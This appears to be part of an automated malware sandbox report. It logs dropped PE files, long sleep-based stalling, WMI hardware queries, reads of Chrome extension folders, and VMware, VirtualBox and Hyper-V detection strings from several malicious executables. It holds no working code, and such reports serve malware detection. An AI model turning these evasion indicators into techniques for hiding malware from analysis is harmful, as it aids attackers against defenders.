Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qMYGMWSI.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tSQOebbY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BVPoHZLO.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IwlvVjWA.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CFNWwRDq.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vIZXTCIC.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DBkeOEgG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lZGHkaDU.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hGBASUlD.log	Jump to dropped file
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jbrdiqcrtdja.sys	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 7440	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7436	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7420	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7424	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7956	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7900	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7900	Thread sleep time: -124062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780	Thread sleep count: 82 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780	Thread sleep time: -164082s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7588	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7588	Thread sleep time: -7590000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908	Thread sleep time: -182091s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep time: -174087s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep count: 89 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep time: -178089s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7588	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe TID: 1284	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe TID: 1284	Thread sleep time: -35964s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3336	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 2536	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -599867s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7528	Thread sleep time: -10800000s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -598266s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -597912s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -597547s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -597422s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -597309s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -597188s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7528	Thread sleep time: -300000s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -597078s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596966s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596857s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596735s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596610s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596485s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596372s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596250s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596141s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -596028s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -595921s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -595779s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -595527s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -595380s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -595259s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -595094s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594982s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594875s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594766s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594625s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594516s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594406s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594297s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594188s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -594078s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593969s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593859s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593750s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593641s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593531s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593422s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593311s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593203s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -593094s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -592980s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe TID: 7604	Thread sleep time: -592747s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe TID: 7968	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2852	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148	Thread sleep count: 6495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368	Thread sleep count: 365 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe TID: 5076	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\DBFIEHDHII.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C59EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 599867
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 598266
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597912
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597547
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597422
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597309
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597188
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597078
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596966
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596857
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596735
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596610
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596485
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596372
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596250
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596141
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596028
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595921
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595779
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595527
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595380
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595259
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595094
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594982
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594875
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594766
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594625
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594516
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594406
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594297
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594188
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594078
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593969
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593859
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593750
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593641
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593531
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593422
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593311
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593203
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593094
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 592980
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 592747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: skotes.exe, skotes.exe, 0000000B.00000002.2188620770.0000000000FC2000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000002.2961860919.0000000000FC2000.00000040.00000001.01000000.0000000E.sdmp, 60c1233683.exe, 00000022.00000002.2952067424.00000000003B8000.00000040.00000001.01000000.0000001A.sdmp, 50c9f14fb7.exe, 00000023.00000002.2875305125.00000000007B1000.00000040.00000001.01000000.0000001B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 0000000C.00000002.2952843084.0000000000599000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH-]%SystemRoot%\system32\mswsock.dll
Source: XXgM7ZsSvR.exe, 00000011.00000002.2454987293.0000021B3BF80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxs
Source: explorer.exe, 00000027.00000002.2952042138.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DBFIEHDHII.exe, 00000009.00000003.2121409998.0000000001808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%
Source: callmobile.exe, 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 00000027.00000002.2952042138.00000000013DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Lr
Source: file.exe, 00000000.00000002.2114430584.00000000017E2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2970961494.000002554F45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2958044030.0000025549E2B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2958937922.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2952042138.0000000001396000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2845395623.000000000140D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2834435232.000000000140D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: callmobile.exe, 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
